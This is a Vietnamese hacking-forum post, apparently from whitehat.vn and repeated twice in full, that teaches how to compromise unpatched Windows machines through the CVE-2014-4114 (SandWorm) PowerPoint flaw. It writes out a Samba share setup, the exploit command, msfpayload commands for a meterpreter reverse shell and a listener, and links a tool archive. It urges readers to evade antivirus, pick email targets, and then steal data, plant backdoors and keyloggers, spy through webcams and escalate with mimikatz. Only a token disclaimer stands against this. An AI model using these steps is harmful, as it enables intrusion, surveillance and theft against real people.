Hackerstudent93
VIP Members
-
30/09/2013
-
38
-
340 bài viết
Nguy hiểm, hack windows qua khai thác lỗ hỏng zero-day
Hi các bạn, hôm nay mình sẽ hướng dẫn các bạn hack windows thông qua khai thác lỗ hỏng zero-day, cụ thể mình sẽ hướng dẫn các bạn khai thác lỗi CVE-2014-4114 MS14-060 Remote Code Execution - PowerPoint2013 Exploit (SandWorm)
Ý tưởng: Đây là một lỗ hỏng rất mới cho phép bạn khai thác nhiều hệ điều hành windows chưa update bản cập nhật vá lỗi của Microsoft , sau khi khai thác thành công, công việc tiếp theo là chúng ta cần đánh cắp thông tin, cài backdoor, dùng mọi cách đề có được quyền cao nhất ( Admin ) để có thể toàn quyền định đoạt hệ thống của nạn nhân. trước khi bắt đầu các bạn cần tìm hiểu những vấn đề sau:
Lỗ hỏng zeroday là gì ?
Metasploit sử dụng từ cơ bản đến nâng cao?
Làm sao để cho nạn nhân mở một tệp tài liệu có chứa mã độc khai thác mà AV không phát hiện được ?
Công cụ và tool cho phép bạn nâng quyền cao nhất lên Admin?
Đối tượng mà các bạn ngắm đến là ai? bạn định phát tán mã độc qua email đến cơ quan tổ chức hay cá nhân ?
Còn rất nhiều những câu hỏi khác, các bạn tự nghiên cứu thêm và trả lời những câu hỏi đó, rồi tư duy một tí
Demo:
Video của tác giả:
[video=youtube;yrsrBDKL2Ws]https://www.youtube.com/watch?v=yrsrBDKL2Ws[/video]
tools sử dụng:http://1drv.ms/1yYXEnZ pass: test
công cụ sử dụng để nâng quyền tôi đề nghị:
http://blog.gentilkiwi.com/mimikatz tham khảo về nó như thế nào và tìm cách download nó về.
file smb.conf trong video mà tác giả đề cập tới nhưng không có viết ra, tôi viết sẵn rồi làm cho giống video chuẩn bị cho các bạn thực hành giống như trong đó sẵn ở đây:
[global]
workgroup = KALI LINUX
server string = Samba Server Version %v
log file = /var/log/samba/log.%m
max log size = 50
idmap config * : backend = tdb
cups options = raw
netbios name = pxe
map to guest = bad user
dns proxy = no
public = yes
## For multiple installations the same time - not lock kernel
kernel oplocks = no
nt acl support = no
security = user
guest account = nobody
[Linux]
comment = Linux
path = /Linux
read only = no
browseable = yes
public = yes
printable = no
guest ok = yes
oplocks = no
level2 oplocks = no
locking = no
chmod -R 0755 /Linux
code trong video:
python exploit.py 192.168.67.131 Linux xxx.exe
ls out/
cp -v out/* ../Linux/
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.67.131 LPORT=8888 exit func=thread X > .. /Linux/xxx.gif
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.67.131 LPORT=8888 E
ls ../Linux/
Sau khi nạn nhân đã mở tệp tài liệu chứa mã độc khai thác bạn sẽ nhận được một phiên kết nối , dùng kỹ năng metasploit mà bạn có để tiến hành đánh cắp thông tin, cài backdoor, keyloger, chụp ảnh màn hình, webcam, sách metasploit tôi đã cung cấp trong diễn đàn , chịu khó đọc tiếng anh để học, kết hợp với tool mimikatz để nâng toàn quyền lên Admin, sử dụng tool đó như thế nào các bạn tự tìm hiểu, tôi không hướng dẫn quá chi tiết cho các bạn nữa. Một số hình ảnh tôi demo để các bạn tham khảo thêm
Lưu ý: Mọi ý tưởng và kiến thức trong bài viết chỉ mang tính chất giáo dục, vui lòng đọc thông tin mục pháp luật liên quan trong diễn đàn, nghiêm cấm thực hiện vào mục đíc xấu, bản quyền thuộc về tác giả và nguồn từ whitehat.vn. Các bạn copy nhớ gi rõ tên tác giả và nguồn. Nhớ thanks mình , mệt quá rồi , đi ngủ trưa chiều còn dậy làm việc nữa
Ý tưởng: Đây là một lỗ hỏng rất mới cho phép bạn khai thác nhiều hệ điều hành windows chưa update bản cập nhật vá lỗi của Microsoft , sau khi khai thác thành công, công việc tiếp theo là chúng ta cần đánh cắp thông tin, cài backdoor, dùng mọi cách đề có được quyền cao nhất ( Admin ) để có thể toàn quyền định đoạt hệ thống của nạn nhân. trước khi bắt đầu các bạn cần tìm hiểu những vấn đề sau:
Lỗ hỏng zeroday là gì ?
Metasploit sử dụng từ cơ bản đến nâng cao?
Làm sao để cho nạn nhân mở một tệp tài liệu có chứa mã độc khai thác mà AV không phát hiện được ?
Công cụ và tool cho phép bạn nâng quyền cao nhất lên Admin?
Đối tượng mà các bạn ngắm đến là ai? bạn định phát tán mã độc qua email đến cơ quan tổ chức hay cá nhân ?
Còn rất nhiều những câu hỏi khác, các bạn tự nghiên cứu thêm và trả lời những câu hỏi đó, rồi tư duy một tí
Demo:
Video của tác giả:
[video=youtube;yrsrBDKL2Ws]https://www.youtube.com/watch?v=yrsrBDKL2Ws[/video]
tools sử dụng:http://1drv.ms/1yYXEnZ pass: test
công cụ sử dụng để nâng quyền tôi đề nghị:
http://blog.gentilkiwi.com/mimikatz tham khảo về nó như thế nào và tìm cách download nó về.
file smb.conf trong video mà tác giả đề cập tới nhưng không có viết ra, tôi viết sẵn rồi làm cho giống video chuẩn bị cho các bạn thực hành giống như trong đó sẵn ở đây:
[global]
workgroup = KALI LINUX
server string = Samba Server Version %v
log file = /var/log/samba/log.%m
max log size = 50
idmap config * : backend = tdb
cups options = raw
netbios name = pxe
map to guest = bad user
dns proxy = no
public = yes
## For multiple installations the same time - not lock kernel
kernel oplocks = no
nt acl support = no
security = user
guest account = nobody
[Linux]
comment = Linux
path = /Linux
read only = no
browseable = yes
public = yes
printable = no
guest ok = yes
oplocks = no
level2 oplocks = no
locking = no
chmod -R 0755 /Linux
code trong video:
python exploit.py 192.168.67.131 Linux xxx.exe
ls out/
cp -v out/* ../Linux/
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.67.131 LPORT=8888 exit func=thread X > .. /Linux/xxx.gif
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.67.131 LPORT=8888 E
ls ../Linux/
Sau khi nạn nhân đã mở tệp tài liệu chứa mã độc khai thác bạn sẽ nhận được một phiên kết nối , dùng kỹ năng metasploit mà bạn có để tiến hành đánh cắp thông tin, cài backdoor, keyloger, chụp ảnh màn hình, webcam, sách metasploit tôi đã cung cấp trong diễn đàn , chịu khó đọc tiếng anh để học, kết hợp với tool mimikatz để nâng toàn quyền lên Admin, sử dụng tool đó như thế nào các bạn tự tìm hiểu, tôi không hướng dẫn quá chi tiết cho các bạn nữa. Một số hình ảnh tôi demo để các bạn tham khảo thêm
Lưu ý: Mọi ý tưởng và kiến thức trong bài viết chỉ mang tính chất giáo dục, vui lòng đọc thông tin mục pháp luật liên quan trong diễn đàn, nghiêm cấm thực hiện vào mục đíc xấu, bản quyền thuộc về tác giả và nguồn từ whitehat.vn. Các bạn copy nhớ gi rõ tên tác giả và nguồn. Nhớ thanks mình , mệt quá rồi , đi ngủ trưa chiều còn dậy làm việc nữa
Chỉnh sửa lần cuối bởi người điều hành:
